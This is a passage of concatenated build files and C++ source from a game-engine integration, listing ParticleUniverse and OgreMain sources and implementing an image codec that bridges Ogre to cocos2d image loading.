include/ParticleAffectors/ParticleUniverseTextureRotatorTokens.h
include/ParticleAffectors/ParticleUniverseVelocityMatchingAffector.h
include/ParticleAffectors/ParticleUniverseVelocityMatchingAffectorTokens.h
include/ParticleAffectors/ParticleUniverseVortexAffector.h
include/ParticleAffectors/ParticleUniverseVortexAffectorTokens.h
include/ParticleObservers/ParticleUniverseOnClearObserver.h
include/ParticleObservers/ParticleUniverseOnClearObserverTokens.h
include/ParticleObservers/ParticleUniverseOnCollisionObserver.h
include/ParticleObservers/ParticleUniverseOnCollisionObserverTokens.h
include/ParticleObservers/ParticleUniverseOnCountObserver.h
include/ParticleObservers/ParticleUniverseOnCountObserverTokens.h
include/ParticleObservers/ParticleUniverseOnEmissionObserver.h
include/ParticleObservers/ParticleUniverseOnEmissionObserverTokens.h
include/ParticleObservers/ParticleUniverseOnEventFlagObserver.h
include/ParticleObservers/ParticleUniverseOnEventFlagObserverTokens.h
include/ParticleObservers/ParticleUniverseOnExpireObserver.h
include/ParticleObservers/ParticleUniverseOnExpireObserverTokens.h
include/ParticleObservers/ParticleUniverseOnPositionObserver.h
include/ParticleObservers/ParticleUniverseOnPositionObserverTokens.h
include/ParticleObservers/ParticleUniverseOnQuotaObserver.h
include/ParticleObservers/ParticleUniverseOnQuotaObserverTokens.h
include/ParticleObservers/ParticleUniverseOnRandomObserver.h
include/ParticleObservers/ParticleUniverseOnRandomObserverTokens.h
include/ParticleObservers/ParticleUniverseOnTimeObserver.h
include/ParticleObservers/ParticleUniverseOnTimeObserverTokens.h
include/ParticleObservers/ParticleUniverseOnVelocityObserver.h
include/ParticleObservers/ParticleUniverseOnVelocityObserverTokens.h
include/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoExpireEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoExpireEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoScaleEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoScaleEventHandlerTokens.h
include/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandler.h
include/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandlerTokens.h
include/Externs/ParticleUniverseBoxColliderExtern.h
include/Externs/ParticleUniverseBoxColliderExternTokens.h
include/Externs/ParticleUniverseGravityExtern.h
include/Externs/ParticleUniverseGravityExternTokens.h
include/Externs/ParticleUniversePhysXActorExtern.h
include/Externs/ParticleUniversePhysXActorExternTokens.h
include/Externs/ParticleUniversePhysXBridge.h
include/Externs/ParticleUniversePhysXFluidExtern.h
include/Externs/ParticleUniversePhysXFluidExternTokens.h
include/Externs/ParticleUniverseSceneDecoratorExtern.h
include/Externs/ParticleUniverseSceneDecoratorExternTokens.h
include/Externs/ParticleUniverseSphereColliderExtern.h
include/Externs/ParticleUniverseSphereColliderExternTokens.h
include/Externs/ParticleUniverseVortexExtern.h
include/Externs/ParticleUniverseVortexExternTokens.h
include/ParticleBehaviours/ParticleUniverseSlaveBehaviour.h
include/ParticleBehaviours/ParticleUniverseSlaveBehaviourTokens.h
)
set (SOURCE_FILES
src/ParticleUniverseAffector.cpp
src/ParticleUniverseAffectorTokens.cpp
src/ParticleUniverseAliasTokens.cpp
src/ParticleUniverseAtlasImage.cpp
src/ParticleUniverseAttachable.cpp
src/ParticleUniverseAttachableTokens.cpp
src/ParticleUniverseBehaviourTokens.cpp
src/ParticleUniverseCameraDependency.cpp
src/ParticleUniverseCameraDependencyTokens.cpp
src/ParticleUniverseDll.cpp
src/ParticleUniverseDynamicAttribute.cpp
src/ParticleUniverseDynamicAttributeTokens.cpp
src/ParticleUniverseEmitter.cpp
src/ParticleUniverseEmitterTokens.cpp
src/ParticleUniverseEventHandlerTokens.cpp
src/ParticleUniverseExtern.cpp
src/ParticleUniverseExternTokens.cpp
src/ParticleUniverseForceField.cpp
src/ParticleUniverseNoise.cpp
src/ParticleUniverseObserver.cpp
src/ParticleUniverseObserverTokens.cpp
src/ParticleUniverseParticle.cpp
src/ParticleUniverseParticlePool.cpp
src/ParticleUniversePCH.cpp
src/ParticleUniversePlugin.cpp
src/ParticleUniverseRenderer.cpp
src/ParticleUniverseRendererTokens.cpp
src/ParticleUniverseScriptDeserializer.cpp
src/ParticleUniverseScriptSerializer.cpp
src/ParticleUniverseSystem.cpp
src/ParticleUniverseSystemManager.cpp
src/ParticleUniverseSystemManagerTokens.cpp
src/ParticleUniverseSystemTokens.cpp
src/ParticleUniverseTechnique.cpp
src/ParticleUniverseTechniqueTokens.cpp
src/ParticleUniverseVisualParticle.cpp
src/ParticleEmitters/ParticleUniverseBoxEmitter.cpp
src/ParticleEmitters/ParticleUniverseBoxEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseCircleEmitter.cpp
src/ParticleEmitters/ParticleUniverseCircleEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseLineEmitter.cpp
src/ParticleEmitters/ParticleUniverseLineEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitter.cpp
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitterTokens.cpp
src/ParticleEmitters/ParticleUniversePointEmitter.cpp
src/ParticleEmitters/ParticleUniversePointEmitterTokens.cpp
src/ParticleEmitters/ParticleUniversePositionEmitter.cpp
src/ParticleEmitters/ParticleUniversePositionEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseSlaveEmitter.cpp
src/ParticleEmitters/ParticleUniverseSlaveEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitter.cpp
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseVertexEmitter.cpp
src/ParticleEmitters/ParticleUniverseVertexEmitterTokens.cpp
src/ParticleRenderers/ParticleUniverseBeamRenderer.cpp
src/ParticleRenderers/ParticleUniverseBeamRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseBillboardRenderer.cpp
src/ParticleRenderers/ParticleUniverseBillboardRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseBox.cpp
src/ParticleRenderers/ParticleUniverseBoxRenderer.cpp
src/ParticleRenderers/ParticleUniverseBoxRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseBoxSet.cpp
src/ParticleRenderers/ParticleUniverseEntityRenderer.cpp
src/ParticleRenderers/ParticleUniverseEntityRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseLightRenderer.cpp
src/ParticleRenderers/ParticleUniverseLightRendererTokens.cpp
src/ParticleRenderers/ParticleUniversePrimitiveShapeSet.cpp
src/ParticleRenderers/ParticleUniverseRibbonTrailRenderer.cpp
src/ParticleRenderers/ParticleUniverseRibbonTrailRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseSphere.cpp
src/ParticleRenderers/ParticleUniverseSphereRenderer.cpp
src/ParticleRenderers/ParticleUniverseSphereRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseSphereSet.cpp
src/ParticleAffectors/ParticleUniverseAlignAffector.cpp
src/ParticleAffectors/ParticleUniverseAlignAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseBaseCollider.cpp
src/ParticleAffectors/ParticleUniverseBaseColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseBaseForceAffector.cpp
src/ParticleAffectors/ParticleUniverseBaseForceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseBoxCollider.cpp
src/ParticleAffectors/ParticleUniverseBoxColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffector.cpp
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseColourAffector.cpp
src/ParticleAffectors/ParticleUniverseColourAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseFlockCenteringAffector.cpp
src/ParticleAffectors/ParticleUniverseFlockCenteringAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseForceFieldAffector.cpp
src/ParticleAffectors/ParticleUniverseForceFieldAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseGeometryRotator.cpp
src/ParticleAffectors/ParticleUniverseGeometryRotatorTokens.cpp
src/ParticleAffectors/ParticleUniverseGravityAffector.cpp
src/ParticleAffectors/ParticleUniverseGravityAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseInterParticleCollider.cpp
src/ParticleAffectors/ParticleUniverseInterParticleColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseJetAffector.cpp
src/ParticleAffectors/ParticleUniverseJetAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseLineAffector.cpp
src/ParticleAffectors/ParticleUniverseLineAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseLinearForceAffector.cpp
src/ParticleAffectors/ParticleUniverseLinearForceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseParticleFollower.cpp
src/ParticleAffectors/ParticleUniverseParticleFollowerTokens.cpp
src/ParticleAffectors/ParticleUniversePathFollower.cpp
src/ParticleAffectors/ParticleUniversePathFollowerTokens.cpp
src/ParticleAffectors/ParticleUniversePlaneCollider.cpp
src/ParticleAffectors/ParticleUniversePlaneColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseRandomiser.cpp
src/ParticleAffectors/ParticleUniverseRandomiserTokens.cpp
src/ParticleAffectors/ParticleUniverseScaleAffector.cpp
src/ParticleAffectors/ParticleUniverseScaleAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseScaleVelocityAffector.cpp
src/ParticleAffectors/ParticleUniverseScaleVelocityAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseSineForceAffector.cpp
src/ParticleAffectors/ParticleUniverseSineForceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseSphereCollider.cpp
src/ParticleAffectors/ParticleUniverseSphereColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseTextureAnimator.cpp
src/ParticleAffectors/ParticleUniverseTextureAnimatorTokens.cpp
src/ParticleAffectors/ParticleUniverseTextureRotator.cpp
src/ParticleAffectors/ParticleUniverseTextureRotatorTokens.cpp
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffector.cpp
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseVortexAffector.cpp
src/ParticleAffectors/ParticleUniverseVortexAffectorTokens.cpp
src/ParticleObservers/ParticleUniverseOnClearObserver.cpp
src/ParticleObservers/ParticleUniverseOnClearObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnCollisionObserver.cpp
src/ParticleObservers/ParticleUniverseOnCollisionObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnCountObserver.cpp
src/ParticleObservers/ParticleUniverseOnCountObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnEmissionObserver.cpp
src/ParticleObservers/ParticleUniverseOnEmissionObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnEventFlagObserver.cpp
src/ParticleObservers/ParticleUniverseOnEventFlagObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnExpireObserver.cpp
src/ParticleObservers/ParticleUniverseOnExpireObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnPositionObserver.cpp
src/ParticleObservers/ParticleUniverseOnPositionObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnQuotaObserver.cpp
src/ParticleObservers/ParticleUniverseOnQuotaObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnRandomObserver.cpp
src/ParticleObservers/ParticleUniverseOnRandomObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnTimeObserver.cpp
src/ParticleObservers/ParticleUniverseOnTimeObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnVelocityObserver.cpp
src/ParticleObservers/ParticleUniverseOnVelocityObserverTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandlerTokens.cpp
src/Externs/ParticleUniverseBoxColliderExtern.cpp
src/Externs/ParticleUniverseBoxColliderExternTokens.cpp
src/Externs/ParticleUniverseGravityExtern.cpp
src/Externs/ParticleUniverseGravityExternTokens.cpp
src/Externs/ParticleUniversePhysXActorExtern.cpp
src/Externs/ParticleUniversePhysXActorExternTokens.cpp
src/Externs/ParticleUniversePhysXBridge.cpp
src/Externs/ParticleUniversePhysXFluidExtern.cpp
src/Externs/ParticleUniversePhysXFluidExternTokens.cpp
src/Externs/ParticleUniverseSceneDecoratorExtern.cpp
src/Externs/ParticleUniverseSceneDecoratorExternTokens.cpp
src/Externs/ParticleUniverseSphereColliderExtern.cpp
src/Externs/ParticleUniverseSphereColliderExternTokens.cpp
src/Externs/ParticleUniverseVortexExtern.cpp
src/Externs/ParticleUniverseVortexExternTokens.cpp
src/ParticleBehaviours/ParticleUniverseSlaveBehaviour.cpp
src/ParticleBehaviours/ParticleUniverseSlaveBehaviourTokens.cpp
)
include_directories("include")
include_directories("../include")
include_directories("../ogre_main/include")
add_library(ogre_particleuniverse STATIC
${SOURCE_FILES}
)
set_target_properties(ogre_particleuniverse
PROPERTIES
ARCHIVE_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
LIBRARY_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
)
<file_sep>#ifndef OGRE_BRIDGE_IMAGE_CODEC_H
#define OGRE_BRIDGE_IMAGE_CODEC_H
#include "cocos2d.h"
#include <OgreCodec.h>
#include <OgreImageCodec.h>
namespace Ogre {
class BridgeImageCodec : public ImageCodec
{
private:
String mType;
cocos2d::Image::Format mImageFitype;
public:
BridgeImageCodec(const String &type, const cocos2d::Image::Format &fiType) :
mType(type),
mImageFitype(fiType)
{}
virtual ~BridgeImageCodec(){}
/// @copydoc Codec::code
DataStreamPtr code(MemoryDataStreamPtr& input, CodecDataPtr& pData) const{return DataStreamPtr();}
/// @copydoc Codec::codeToFile
void codeToFile(MemoryDataStreamPtr& input, const String& outFileName, CodecDataPtr& pData) const{}
/// @copydoc Codec::decode
virtual Codec::DecodeResult decode(DataStreamPtr& input) const;
virtual String getType() const{ return mType; }
/// @copydoc Codec::magicNumberToFileExt
String magicNumberToFileExt(const char *magicNumberPtr, size_t maxbytes) const{return "";}
/// Static method to startup FreeImage and register the FreeImage codecs
static void startup(void);
/// Static method to shutdown FreeImage and unregister the FreeImage codecs
static void shutdown(void);
};
}
#endif//OGREAPP_H
<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE := ogremain_static
LOCAL_MODULE_FILENAME := libogremain
# ogre_main
LOCAL_OGRE_MAIN_INCLUDE := \
$(LOCAL_PATH)/include \
$(LOCAL_PATH)/include/Threading \
$(LOCAL_PATH)/include/Android \
$(LOCAL_PATH)/src/nedmalloc
LOCAL_OGRE_MAIN_SRC_FILES := \
src/OgreAlignedAllocator.cpp \
src/OgreAnimable.cpp \
src/OgreAnimation.cpp \
src/OgreAnimationState.cpp \
src/OgreAnimationTrack.cpp \
src/OgreArchiveManager.cpp \
src/OgreAutoParamDataSource.cpp \
src/OgreAxisAlignedBox.cpp \
src/OgreBillboard.cpp \
src/OgreBillboardChain.cpp \
src/OgreBillboardParticleRenderer.cpp \
src/OgreBillboardSet.cpp \
src/OgreBone.cpp \
src/OgreBorderPanelOverlayElement.cpp \
src/OgreCamera.cpp \
src/OgreCodec.cpp \
src/OgreColourValue.cpp \
src/OgreCommon.cpp \
src/OgreCompositionPass.cpp \
src/OgreCompositionTargetPass.cpp \
src/OgreCompositionTechnique.cpp \
src/OgreCompositor.cpp \
src/OgreCompositorChain.cpp \
src/OgreCompositorInstance.cpp \
src/OgreCompositorManager.cpp \
src/OgreConfigFile.cpp \
src/OgreControllerManager.cpp \
src/OgreConvexBody.cpp \
src/OgreDataStream.cpp \
src/OgreDefaultHardwareBufferManager.cpp \
src/OgreDefaultSceneQueries.cpp \
src/OgreDeflate.cpp \
src/OgreDepthBuffer.cpp \
src/OgreDistanceLodStrategy.cpp \
src/OgreDualQuaternion.cpp \
src/OgreDynLib.cpp \
src/OgreDynLibManager.cpp \
src/OgreEdgeListBuilder.cpp \
src/OgreEntity.cpp \
src/OgreException.cpp \
src/OgreExternalTextureSource.cpp \
src/OgreExternalTextureSourceManager.cpp \
src/OgreFileSystem.cpp \
src/OgreFont.cpp \
src/OgreFontManager.cpp \
src/OgreFrustum.cpp \
src/OgreGpuProgram.cpp \
src/OgreGpuProgramManager.cpp \
src/OgreGpuProgramParams.cpp \
src/OgreGpuProgramUsage.cpp \
src/OgreHardwareBufferManager.cpp \
src/OgreHardwareIndexBuffer.cpp \
src/OgreHardwareOcclusionQuery.cpp \
src/OgreHardwarePixelBuffer.cpp \
src/OgreHardwareVertexBuffer.cpp \
src/OgreHighLevelGpuProgram.cpp \
src/OgreHighLevelGpuProgramManager.cpp \
src/OgreImage.cpp \
src/OgreInstanceBatch.cpp \
src/OgreInstanceBatchHW.cpp \
src/OgreInstanceBatchHW_VTF.cpp \
src/OgreInstanceBatchShader.cpp \
src/OgreInstanceBatchVTF.cpp \
src/OgreInstancedGeometry.cpp \
src/OgreInstancedEntity.cpp \
src/OgreInstanceManager.cpp \
src/OgreKeyFrame.cpp \
src/OgreLight.cpp \
src/OgreLodStrategy.cpp \
src/OgreLodStrategyManager.cpp \
src/OgreLog.cpp \
src/OgreLogManager.cpp \
src/OgreManualObject.cpp \
src/OgreMaterial.cpp \
src/OgreMaterialManager.cpp \
src/OgreMaterialSerializer.cpp \
src/OgreMath.cpp \
src/OgreMatrix3.cpp \
src/OgreMatrix4.cpp \
src/OgreMemoryAllocatedObject.cpp \
src/OgreMemoryNedAlloc.cpp \
src/OgreMemoryNedPooling.cpp \
src/OgreMemoryTracker.cpp \
src/OgreMesh.cpp \
src/OgreMeshManager.cpp \
src/OgreMeshSerializer.cpp \
src/OgreMeshSerializerImpl.cpp \
src/OgreMovableObject.cpp \
src/OgreMovablePlane.cpp \
src/OgreNode.cpp \
src/OgreNumerics.cpp \
src/OgreOptimisedUtil.cpp \
src/OgreOptimisedUtilGeneral.cpp \
src/OgreOptimisedUtilSSE.cpp \
src/OgreOverlay.cpp \
src/OgreOverlayContainer.cpp \
src/OgreOverlayElement.cpp \
src/OgreOverlayElementCommands.cpp \
src/OgreOverlayElementFactory.cpp \
src/OgreOverlayManager.cpp \
src/OgrePanelOverlayElement.cpp \
src/OgreParticle.cpp \
src/OgreParticleEmitter.cpp \
src/OgreParticleEmitterCommands.cpp \
src/OgreParticleIterator.cpp \
src/OgreParticleSystem.cpp \
src/OgreParticleSystemManager.cpp \
src/OgrePass.cpp \
src/OgrePatchMesh.cpp \
src/OgrePatchSurface.cpp \
src/OgrePixelCountLodStrategy.cpp \
src/OgrePixelFormat.cpp \
src/OgrePlane.cpp \
src/OgrePlatformInformation.cpp \
src/OgrePolygon.cpp \
src/OgrePose.cpp \
src/OgrePrecompiledHeaders.cpp \
src/OgrePredefinedControllers.cpp \
src/OgrePrefabFactory.cpp \
src/OgreProfiler.cpp \
src/OgreProgressiveMesh.cpp \
src/OgreQuaternion.cpp \
src/OgreRectangle2D.cpp \
src/OgreRenderQueue.cpp \
src/OgreRenderQueueInvocation.cpp \
src/OgreRenderQueueSortingGrouping.cpp \
src/OgreRenderSystem.cpp \
src/OgreRenderSystemCapabilities.cpp \
src/OgreRenderSystemCapabilitiesManager.cpp \
src/OgreRenderSystemCapabilitiesSerializer.cpp \
src/OgreRenderTarget.cpp \
src/OgreRenderTexture.cpp \
src/OgreRenderToVertexBuffer.cpp \
src/OgreRenderWindow.cpp \
src/OgreResource.cpp \
src/OgreResourceBackgroundQueue.cpp \
src/OgreResourceGroupManager.cpp \
src/OgreResourceManager.cpp \
src/OgreRibbonTrail.cpp \
src/OgreRoot.cpp \
src/OgreRotationSpline.cpp \
src/OgreSceneManager.cpp \
src/OgreSceneManagerEnumerator.cpp \
src/OgreSceneNode.cpp \
src/OgreSceneQuery.cpp \
src/OgreScriptCompiler.cpp \
src/OgreScriptLexer.cpp \
src/OgreScriptParser.cpp \
src/OgreScriptTranslator.cpp \
src/OgreSerializer.cpp \
src/OgreShadowCameraSetup.cpp \
src/OgreShadowCameraSetupFocused.cpp \
src/OgreShadowCameraSetupLiSPSM.cpp \
src/OgreShadowCameraSetupPlaneOptimal.cpp \
src/OgreShadowCameraSetupPSSM.cpp \
src/OgreShadowCaster.cpp \
src/OgreShadowTextureManager.cpp \
src/OgreShadowVolumeExtrudeProgram.cpp \
src/OgreSimpleRenderable.cpp \
src/OgreSimpleSpline.cpp \
src/OgreSkeleton.cpp \
src/OgreSkeletonInstance.cpp \
src/OgreSkeletonManager.cpp \
src/OgreSkeletonSerializer.cpp \
src/OgreSmallVector.cpp \
src/OgreStaticGeometry.cpp \
src/OgreStreamSerialiser.cpp \
src/OgreString.cpp \
src/OgreStringConverter.cpp \
src/OgreStringInterface.cpp \
src/OgreSubEntity.cpp \
src/OgreSubMesh.cpp \
src/OgreTagPoint.cpp \
src/OgreTangentSpaceCalc.cpp \
src/OgreTechnique.cpp \
src/OgreTextAreaOverlayElement.cpp \
src/OgreTexture.cpp \
src/OgreTextureManager.cpp \
src/OgreTextureUnitState.cpp \
src/OgreUnifiedHighLevelGpuProgram.cpp \
src/OgreUserObjectBindings.cpp \
src/OgreUTFString.cpp \
src/OgreVector2.cpp \
src/OgreVector3.cpp \
src/OgreVector4.cpp \
src/OgreVertexIndexData.cpp \
src/OgreViewport.cpp \
src/OgreWindowEventUtilities.cpp \
src/OgreWireBoundingBox.cpp \
src/OgreWorkQueue.cpp \
src/OgreFreeImageCodec.cpp \
src/OgreDDSCodec.cpp \
src/OgreZip.cpp \
src/Threading/OgreDefaultWorkQueueStandard.cpp \
src/common/OgreConfigDialog.cpp \
src/common/OgreErrorDialog.cpp \
src/common/OgreTimer.cpp
LOCAL_EXPORT_C_INCLUDES := \
$(LOCAL_PATH)/../../../cocos \
$(LOCAL_PATH)/../../../cocos/platform/android \
$(LOCAL_PATH)/../../../external/freetype2/include/android \
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_MAIN_INCLUDE)
LOCAL_SRC_FILES := \
LOCAL_SRC_FILES += $(LOCAL_OGRE_MAIN_SRC_FILES)
LOCAL_WHOLE_STATIC_LIBRARIES := cocos2dx_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,platform/android)<file_sep>#include "OgreBridgeImageCodec.h"
#include <OgreCodec.h>
#include <renderer/CCTexture2D.h>
namespace Ogre {
class BridgeImageStream : public cocos2d::Image
{
private:
Format mImageType;
public:
BridgeImageStream(const Format &fiType) :
mImageType(fiType)
{}
virtual ~BridgeImageStream(){}
bool decode(DataStreamPtr& input)
{
MemoryDataStream memStream(input, true);
ssize_t size = memStream.size();
const unsigned char *data = memStream.getPtr();
bool ret = false;
switch (mImageType)
{
case Format::PNG:
ret = initWithPngData(data, size);
break;
case Format::JPG:
ret = initWithJpgData(data, size);
break;
case Format::TIFF:
ret = initWithTiffData(data, size);
break;
case Format::WEBP:
ret = initWithWebpData(data, size);
break;
case Format::PVR:
ret = initWithPVRData(data, size);
break;
case Format::ETC:
ret = initWithETCData(data, size);
break;
case Format::S3TC:
ret = initWithS3TCData(data, size);
break;
case Format::ATITC:
ret = initWithATITCData(data, size);
break;
default:
{
/* // load and detect image format
tImageTGA* tgaData = tgaLoadBuffer(data, size);
if (tgaData != nullptr && tgaData->status == TGA_OK)
{
ret = initWithTGAData(tgaData);
}
else
{
CCAssert(false, "unsupport image format!");
}
free(tgaData);
break;*/
}
}
return ret;
}
bool useImageData(ImageCodec::ImageData* imgData)
{
bool ret = true;
switch (getRenderFormat())
{
//! 32-bit texture: BGRA8888
case cocos2d::Texture2D::PixelFormat::BGRA8888:
imgData->format = PF_A8B8G8R8;
break;
//! 32-bit texture: RGBA8888
case cocos2d::Texture2D::PixelFormat::RGBA8888:
imgData->format = PF_A8R8G8B8;
break;
//! 24-bit texture: RGBA888
case cocos2d::Texture2D::PixelFormat::RGB888:
imgData->format = PF_R8G8B8;
break;
//! 16-bit texture without Alpha channel
case cocos2d::Texture2D::PixelFormat::RGB565:
imgData->format = PF_R5G6B5;
break;
//! 8-bit textures used as masks
case cocos2d::Texture2D::PixelFormat::A8:
imgData->format = PF_A8;
break;
//! 8-bit intensity texture
case cocos2d::Texture2D::PixelFormat::I8:
imgData->format = PF_L8;
break;
//! 16-bit textures used as masks
case cocos2d::Texture2D::PixelFormat::AI88:
imgData->format = PF_BYTE_LA;
break;
//! 16-bit textures: RGBA4444
case cocos2d::Texture2D::PixelFormat::RGBA4444:
imgData->format = PF_A4R4G4B4;
break;
//! 16-bit textures: RGB5A1
case cocos2d::Texture2D::PixelFormat::RGB5A1:
imgData->format = PF_A1R5G5B5;
break;
//! 4-bit PVRTC-compressed texture: PVRTC4
case cocos2d::Texture2D::PixelFormat::PVRTC4:
imgData->format = PF_PVRTC_RGB4;
break;
//! 4-bit PVRTC-compressed texture: PVRTC4 (has alpha channel)
case cocos2d::Texture2D::PixelFormat::PVRTC4A:
imgData->format = PF_PVRTC_RGBA4;
break;
//! 2-bit PVRTC-compressed texture: PVRTC2
case cocos2d::Texture2D::PixelFormat::PVRTC2:
imgData->format = PF_PVRTC_RGB2;
break;
//! 2-bit PVRTC-compressed texture: PVRTC2 (has alpha channel)
case cocos2d::Texture2D::PixelFormat::PVRTC2A:
imgData->format = PF_PVRTC_RGBA2;
break;
//! ETC-compressed texture: ETC
case cocos2d::Texture2D::PixelFormat::ETC:
//! S3TC-compressed texture: S3TC_Dxt1
case cocos2d::Texture2D::PixelFormat::S3TC_DXT1:
//! S3TC-compressed texture: S3TC_Dxt3
case cocos2d::Texture2D::PixelFormat::S3TC_DXT3:
//! S3TC-compressed texture: S3TC_Dxt5
case cocos2d::Texture2D::PixelFormat::S3TC_DXT5:
//! ATITC-compressed texture: ATC_RGB
case cocos2d::Texture2D::PixelFormat::ATC_RGB:
//! ATITC-compressed texture: ATC_EXPLICIT_ALPHA
case cocos2d::Texture2D::PixelFormat::ATC_EXPLICIT_ALPHA:
//! ATITC-compresed texture: ATC_INTERPOLATED_ALPHA
case cocos2d::Texture2D::PixelFormat::ATC_INTERPOLATED_ALPHA:
//! Default texture format: AUTO
default: // Texture2D::PixelFormat::DEFAULT = AUTO:
imgData->format = PF_UNKNOWN;
ret = false;
break;
};
if (ret)
{
imgData->depth = 1; // only 2D formats handled by this codec
imgData->width = getWidth();
imgData->height = getHeight();
imgData->num_mipmaps = 0; // no mipmaps in non-DDS
imgData->flags = 0;
imgData->size = getDataLen();
}
return ret;
}
bool useStreamImagePtr(MemoryDataStreamPtr &output)
{
bool ret = true;
if (this->getDataLen() > 0)
{
output.bind(OGRE_NEW MemoryDataStream(this->getDataLen()));
uchar* pDst = output->getPtr();
uchar* pSrc = this->getData();
memcpy(pDst, pSrc, this->getDataLen());
}
else
ret = false;
return ret;
}
};
static std::vector<ImageCodec * > s_sCodecList;
/// @copydoc Codec::decode
Codec::DecodeResult BridgeImageCodec::decode(DataStreamPtr& input) const
{
BridgeImageStream mImageStream(mImageFitype);
bool ret = true;
if (ret)
{
ret = mImageStream.decode(input);
}
ImageData* imgData = NULL;
if (ret)
{
imgData = OGRE_NEW ImageData();
ret = mImageStream.useImageData(imgData);
}
MemoryDataStreamPtr output;
if (ret)
{
ret = mImageStream.useStreamImagePtr(output);
}
DecodeResult result;
if (ret)
{
result.first = output;
result.second = CodecDataPtr(imgData);
}
return result;
}
/// Static method to startup FreeImage and register the FreeImage codecs
void BridgeImageCodec::startup(void)
{
static const int supports_num = 8;
static const String supports[] = { "png", "jpg", "tiff", "webp", "pvr", "etc", "s3tc", "atitc" };
static const cocos2d::Image::Format supports_type[] = { cocos2d::Image::Format::PNG, cocos2d::Image::Format::JPG, cocos2d::Image::Format::TIFF, cocos2d::Image::Format::WEBP, cocos2d::Image::Format::PVR, cocos2d::Image::Format::ETC, cocos2d::Image::Format::S3TC, cocos2d::Image::Format::ATITC };
BridgeImageCodec* codec = NULL;
